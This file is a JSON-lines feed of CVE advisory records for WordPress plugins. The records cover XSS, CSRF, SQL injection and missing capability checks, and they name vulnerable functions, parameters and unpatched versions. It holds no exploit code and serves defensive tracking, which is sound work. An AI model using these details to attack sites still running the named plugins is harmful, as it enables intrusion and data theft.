{"CVE_ID":"CVE-2023-3011","slug":"armember-membership","versionImpact":"4.0.5","description":"The ARMember plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.0.5. This is due to missing or incorrect nonce validation on the arm_check_user_cap function. This makes it possible for unauthenticated attackers to perform multiple unauthorized actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42f5f29b-2d83-4b15-82aa-0598f8a2317b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42f5f29b-2d83-4b15-82aa-0598f8a2317b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2932691\\\/armember-membership\\\/trunk\\\/autoload.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2932691\\\/armember-membership\\\/trunk\\\/autoload.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36769","slug":"widget-settings-importexport","versionImpact":"1.5.3","description":"The Widget Settings Importer\/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e14f0fc6-fca4-4dd7-8f7b-ed5ed535c9af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e14f0fc6-fca4-4dd7-8f7b-ed5ed535c9af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/04\\\/unpatched-high-severity-vulnerability-in-widget-settings-importer-exporter-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/04\\\/unpatched-high-severity-vulnerability-in-widget-settings-importer-exporter-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1127","slug":"eventprime-event-calendar-management","versionImpact":"3.4.1","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the booking_export_all() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve all event bookings, which can contain PII.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39da62be-e630-48cd-b732-80ed3d337638?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39da62be-e630-48cd-b732-80ed3d337638?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/trunk\\\/\\\/includes\\\/service\\\/class-ep-ajax.php#L1994\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/trunk\\\/\\\/includes\\\/service\\\/class-ep-ajax.php#L1994\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4705","slug":"testimonials-widget","versionImpact":"4.0.4","description":"The Testimonials Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonials shortcode in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef4603b2-bd41-4f65-ba2a-8d06e32e67c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef4603b2-bd41-4f65-ba2a-8d06e32e67c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-widget\\\/trunk\\\/includes\\\/class-testimonials-widget-premium.php#L2198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-widget\\\/trunk\\\/includes\\\/class-testimonials-widget-premium.php#L2198\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6859","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking WordPress plugin through 0.1.12 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34ae6121-304f-495b-bcc1-4fbd3d70a9fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34ae6121-304f-495b-bcc1-4fbd3d70a9fb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8548","slug":"kb-support","versionImpact":"1.6.6","description":"The KB Support \u2013 WordPress Help Desk and Knowledge Base plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on several functions in all versions up to, and including, 1.6.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform multiple administrative actions, such as replying to arbitrary tickets, updating the status of any post, deleting any post, adding notes to tickets, flagging or unflagging tickets, and adding or removing ticket participants.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fb90b3b-08bd-4887-a6bf-054b42d3e403?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fb90b3b-08bd-4887-a6bf-054b42d3e403?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L240\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L240\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L458\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L458\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L531\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L580\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L580\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L605\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L605\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L630\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L630\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L649\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L649\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L801\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L801\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L869\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/ajax-functions.php#L869\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9382","slug":"gantry","versionImpact":"4.1.21","description":"The Gantry 4 Framework plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'override_id' parameter in all versions up to, and including, 4.1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d539a066-6b59-4235-868e-f3085436e9f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d539a066-6b59-4235-868e-f3085436e9f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gantry\\\/trunk\\\/admin_functions.php#L677\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gantry\\\/trunk\\\/admin_functions.php#L677\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13880","slug":"my-quota","versionImpact":"1.0.8","description":"The My Quota WordPress plugin through 1.0.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bee3b002-e808-4402-8bf6-4375ed7b3807\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bee3b002-e808-4402-8bf6-4375ed7b3807\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6212","slug":"ultimate-addons-for-contact-form-7","description":"The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Database module in versions 3.5.11 to 3.5.19 due to insufficient input sanitization and output escaping. The unfiltered field names are stored alongside the sanitized values. Later, the admin-side AJAX endpoint ajax_get_table_data() returns those raw names as JSON column headers, and the client-side DataTables renderer injects them directly into the DOM without any HTML encoding. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/assets\\\/js\\\/database-pro-main.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/assets\\\/js\\\/database-pro-main.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/database.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/database.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316177\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316177\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f49e48cb-7d0b-4bcf-9090-869472b8442a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f49e48cb-7d0b-4bcf-9090-869472b8442a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6385","slug":"wp-applink","versionImpact":"0.4.1","description":"The WP Applink plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 parameter in all versions up to, and including, 0.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-applink\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-applink\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75e41e78-ce8c-4248-9eca-b36391fbbbde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75e41e78-ce8c-4248-9eca-b36391fbbbde?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28664","slug":"wp-meta-data-filter-and-taxonomy-filter","description":"The Meta Data and Taxonomies Filter WordPress plugin, in versions < 1.3.1, is affected by a reflected cross-site scripting vulnerability in the 'tax_name' parameter of the mdf_get_tax_options_in_widget action, which can only be triggered by an authenticated user.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2717","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.9.8. This is due to missing nonce validation on the 'enable_safe_mode' function. This makes it possible for unauthenticated attackers to enable safe mode, which disables all other plugins, via a forged request if they can successfully trick an administrator into performing an action such as clicking on a link. A warning message about safe mode is displayed to the admin, which can be easily disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af73240c-b711-4e91-9998-5f7e6a9a4fb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af73240c-b711-4e91-9998-5f7e6a9a4fb9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L67\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1615","slug":"ultimate-addons-for-contact-form-7","versionImpact":"3.1.23","description":"The Ultimate Addons for Contact Form 7 plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in versions up to, and including, 3.1.23. This makes it possible for authenticated attackers of any authorization level to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-addons-for-contact-form-7\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2901676\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2901676\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/database.php?rev=2897709#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/addons\\\/database\\\/database.php?rev=2897709#L255\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/817ca119-ddaf-4525-beee-68c4e0aac544?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/817ca119-ddaf-4525-beee-68c4e0aac544?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2869","slug":"wp-members","versionImpact":"3.4.7.3","description":"The WP-Members Membership plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the do_field_reorder function in versions up to, and including, 3.4.7.3. This makes it possible for authenticated attackers with subscriber-level access to reorder form elements on login forms.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/trunk\\\/includes\\\/admin\\\/tabs\\\/class-wp-members-admin-tab-fields.php?rev=2895180#L799\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/trunk\\\/includes\\\/admin\\\/tabs\\\/class-wp-members-admin-tab-fields.php?rev=2895180#L799\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920897\\\/wp-members\\\/trunk\\\/includes\\\/admin\\\/tabs\\\/class-wp-members-admin-tab-fields.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920897\\\/wp-members\\\/trunk\\\/includes\\\/admin\\\/tabs\\\/class-wp-members-admin-tab-fields.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf05a79a-0375-4c9d-bbf0-a87484327b87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf05a79a-0375-4c9d-bbf0-a87484327b87?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6922","slug":"coming-soon-maintenance-mode-from-acurax","versionImpact":"2.6","description":"The Under Construction \/ Maintenance Mode from Acurax plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.6 via the 'acx_csma_subscribe_ajax' function. This can allow authenticated attackers to extract sensitive data such as names and email addresses of subscribed visitors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a75f4eb-698b-4c92-9829-de6c55e21ecb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a75f4eb-698b-4c92-9829-de6c55e21ecb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon-maintenance-mode-from-acurax\\\/trunk\\\/function.php?rev=2539156#L612\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coming-soon-maintenance-mode-from-acurax\\\/trunk\\\/function.php?rev=2539156#L612\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1126","slug":"eventprime-event-calendar-management","versionImpact":"3.4.1","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_attendees_email_by_event_id() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve the attendees list for any event.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d266b6ee-24ec-4363-a986-5ccd4db5ae3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d266b6ee-24ec-4363-a986-5ccd4db5ae3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3973","slug":"house-manager","versionImpact":"1.0.8.4","description":"The House Manager WordPress plugin through 1.0.8.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c6ce66e-091a-41da-a13d-5f80cadb499a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c6ce66e-091a-41da-a13d-5f80cadb499a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6856","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking WordPress plugin through 0.1.12 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9700845e-89ca-4f9b-95f0-4b46a975b662\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9700845e-89ca-4f9b-95f0-4b46a975b662\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7869","slug":"123-chat-videochat","versionImpact":"1.3.1","description":"The 123.chat - Video Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d4469e4-5d99-4a56-bde8-9a0aaca7794f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d4469e4-5d99-4a56-bde8-9a0aaca7794f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/123-chat-videochat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/123-chat-videochat\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9373","slug":"elemenda","versionImpact":"0.0.2","description":"The Elemenda plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a8ac027-f376-4f02-a085-f05f1fa749f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a8ac027-f376-4f02-a085-f05f1fa749f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elemenda\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elemenda\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11032","slug":"wp-parsidate","versionImpact":"5.1.1","description":"The Parsi Date plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-parsidate\\\/tags\\\/5.1.1\\\/includes\\\/general.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-parsidate\\\/tags\\\/5.1.1\\\/includes\\\/general.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195986\\\/wp-parsidate\\\/trunk\\\/includes\\\/general.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195986\\\/wp-parsidate\\\/trunk\\\/includes\\\/general.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-parsidate\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-parsidate\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72383bd3-82b4-4aea-9a1c-277ad06e2500?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72383bd3-82b4-4aea-9a1c-277ad06e2500?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
